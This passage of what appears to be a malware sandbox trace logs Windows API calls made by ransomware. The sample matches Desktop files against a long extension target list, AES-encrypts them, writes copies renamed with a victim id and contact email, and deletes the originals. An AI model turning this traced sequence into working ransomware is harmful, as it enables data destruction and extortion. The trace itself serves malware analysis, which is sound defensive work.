s.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".avi") returned 0x0
	[0182.286] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50792770, ftCreationTime.dwHighDateTime=0x1d96a77, ftLastAccessTime.dwLowDateTime=0x8525ddc0, ftLastAccessTime.dwHighDateTime=0x1d96c38, ftLastWriteTime.dwLowDateTime=0x8525ddc0, ftLastWriteTime.dwHighDateTime=0x1d96c38, nFileSizeHigh=0x0, nFileSizeLow=0xaf59, dwReserved0=0x0, dwReserved1=0x0, cFileName="m0ZX pU6B880.mp3", cAlternateFileName="M0ZXPU~1.MP3")) returned 1
	[0182.286] lstrcmpW (lpString1="m0ZX pU6B880.mp3", lpString2="..") returned 1
	[0182.286] lstrcmpW (lpString1="m0ZX pU6B880.mp3", lpString2=".") returned 1
	[0182.287] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0182.287] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="m0ZX pU6B880.mp3" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\m0ZX pU6B880.mp3") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\m0ZX pU6B880.mp3"
	[0182.287] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\m0ZX pU6B880.mp3") returned 46
	[0182.287] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0182.287] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\m0ZX pU6B880.mp3", cchLength=0x2e | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\m0zx pu6b880.mp3") returned 0x2e
	[0182.287] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.287] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\m0zx pu6b880.mp3", lpSrch="help_decrypt_your_files") returned 0x0
	[0182.287] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\m0zx pu6b880.mp3" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\m0zx pu6b880.mp3") returned="c:\\users\\rdhj0cnfevzx\\desktop\\m0zx pu6b880.mp3"
	[0182.287] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\m0zx pu6b880.mp3") returned 46
	[0182.288] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.288] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.288] StrStrW (lpFirst=".mp3", lpSrch=".") returned=".mp3"
	[0182.288] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.288] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mp3") returned=".mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0182.289] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0182.289] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0182.289] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\m0zx pu6b880.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\m0zx pu6b880.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0182.293] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xaf59, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0xaf59, lpOverlapped=0x0) returned 1
	[0182.296] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.296] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb198) returned 1
	[0182.299] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.300] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0182.300] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.300] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0182.300] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.300] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0182.300] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.300] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0xaf59, dwBufLen=0xaf59 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0xaf60) returned 1
	[0182.302] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.302] RtlMoveMemory (in: Destination=0xfe80e8, Source=0xfdd180, Length=0xaf59 | out: Destination=0xfe80e8) 
	[0182.302] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.302] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe80e8*, pdwDataLen=0x18bc0c*=0xaf59, dwBufLen=0xaf60 | out: pbData=0xfe80e8*, pdwDataLen=0x18bc0c*=0xaf60) returned 1
	[0182.305] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.305] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0182.305] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.306] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0182.306] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.306] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0182.306] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.306] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0182.307] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.307] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0182.308] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\m0zx pu6b880.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 88
	[0182.308] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\m0zx pu6b880.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\m0zx pu6b880.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0182.309] WriteFile (in: hFile=0x388, lpBuffer=0xfe80e8*, nNumberOfBytesToWrite=0xaf60, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe80e8*, lpNumberOfBytesWritten=0x18c068*=0xaf60, lpOverlapped=0x0) returned 1
	[0182.314] CloseHandle (hObject=0x388) returned 1
	[0182.314] CloseHandle (hObject=0x384) returned 1
	[0182.314] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\m0zx pu6b880.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\m0zx pu6b880.mp3")) returned 1
	[0182.322] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\m0zx pu6b880.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\m0zx pu6b880.mp3")) returned 0
	[0182.322] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb78f50b0, ftCreationTime.dwHighDateTime=0x1d96b0d, ftLastAccessTime.dwLowDateTime=0xedafda30, ftLastAccessTime.dwHighDateTime=0x1d96eae, ftLastWriteTime.dwLowDateTime=0xedafda30, ftLastWriteTime.dwHighDateTime=0x1d96eae, nFileSizeHigh=0x0, nFileSizeLow=0x18410, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mj7pOg-SFtGg.ots", cAlternateFileName="MJ7POG~1.OTS")) returned 1
	[0182.322] lstrcmpW (lpString1="Mj7pOg-SFtGg.ots", lpString2="..") returned 1
	[0182.323] lstrcmpW (lpString1="Mj7pOg-SFtGg.ots", lpString2=".") returned 1
	[0182.323] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0182.323] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="Mj7pOg-SFtGg.ots" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Mj7pOg-SFtGg.ots") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Mj7pOg-SFtGg.ots"
	[0182.323] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Mj7pOg-SFtGg.ots") returned 46
	[0182.323] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0182.323] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Mj7pOg-SFtGg.ots", cchLength=0x2e | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\mj7pog-sftgg.ots") returned 0x2e
	[0182.323] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.323] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\mj7pog-sftgg.ots", lpSrch="help_decrypt_your_files") returned 0x0
	[0182.324] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\mj7pog-sftgg.ots" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\mj7pog-sftgg.ots") returned="c:\\users\\rdhj0cnfevzx\\desktop\\mj7pog-sftgg.ots"
	[0182.324] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\mj7pog-sftgg.ots") returned 46
	[0182.324] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.324] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.324] StrStrW (lpFirst=".ots", lpSrch=".") returned=".ots"
	[0182.324] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.325] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bm